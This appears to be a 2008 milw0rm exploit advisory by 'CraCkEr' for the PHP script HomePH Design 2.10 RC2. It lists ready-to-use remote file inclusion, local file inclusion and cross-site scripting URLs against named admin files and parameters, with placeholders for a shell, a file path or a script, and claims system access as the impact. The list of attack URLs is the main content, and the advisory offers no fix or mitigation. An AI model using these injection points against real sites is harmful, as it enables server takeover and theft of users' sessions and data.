┌┌───────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Remote File Include ] [ Local File Include ] [XSS] ┌┘ └───────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : : : │ Group : uNiTeD CraCkiNg ForCE │ │ │ │ Script : HomePH Design 2.10 RC2 │ │ Register Globals : │ │ Download : SourceForge.net │ │ │ │ Method : GET │ │ [█] ON [ ] OFF │ │ Critical : High [░░▒▒▓▓██] │ │ │ │ Impact : System access │ │ │ │ ────────────────────────────────────┘ └─────────────────────────────────── │ │ DALnet #crackers ┌┘ └───────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ Typically used for remotely exploitable vulnerabilities that can lead to │ │ system compromise. │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────┐ ┌┘ Exploit URL's ┌┘ └───────────────────────────────────────────────────────────────────────────┘┘ [RFI] http://localhost/path/admin/templates/template_thumbnail.php?thumb_template=[SHELL] [LFI] http://localhost/path/admin/templates/template_thumbnail.php?thumb_template=[LFI] http://localhost/path/admin/features/account/account.php?language=[LFI] http://localhost/path/admin/features/downloads/downloads.php?language=[LFI] http://localhost/path/admin/features/forum/forum.php?language=[LFI] http://localhost/path/admin/features/fotogalerie/delete.php?language=[LFI] http://localhost/path/admin/features/fotogalerie/fotogalerie.php?language=[LFI] [XSS] http://localhost/path/admin/features/register/register.php?error_meldung=[XSS] http://localhost/path/admin/features/memberlist/memberlist.php?feature_language[ueberschrift]=[XSS] http://localhost/path/admin/features/lostpassword/lostpassword.php?language_array[ueberschrift]=[XSS] http://localhost/path/admin/features/kalender/eingabe.php?language_feature[titel]=[XSS] http://localhost/path/admin/features/fotogalerie/eingabe.php?language_feature[bildmenu]=[XSS] Notes: More files are infected. ═════ └────────────────────────────────────────────────────────────────────────────┘ Greets: The_PitBull, Raz0r, iNs, Sad, CwG GeNiuS ┌┌───────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2008 ┌┘ └───────────────────────────────────────────────────────────────────────────┘┘ # milw0rm.com [2008-06-22]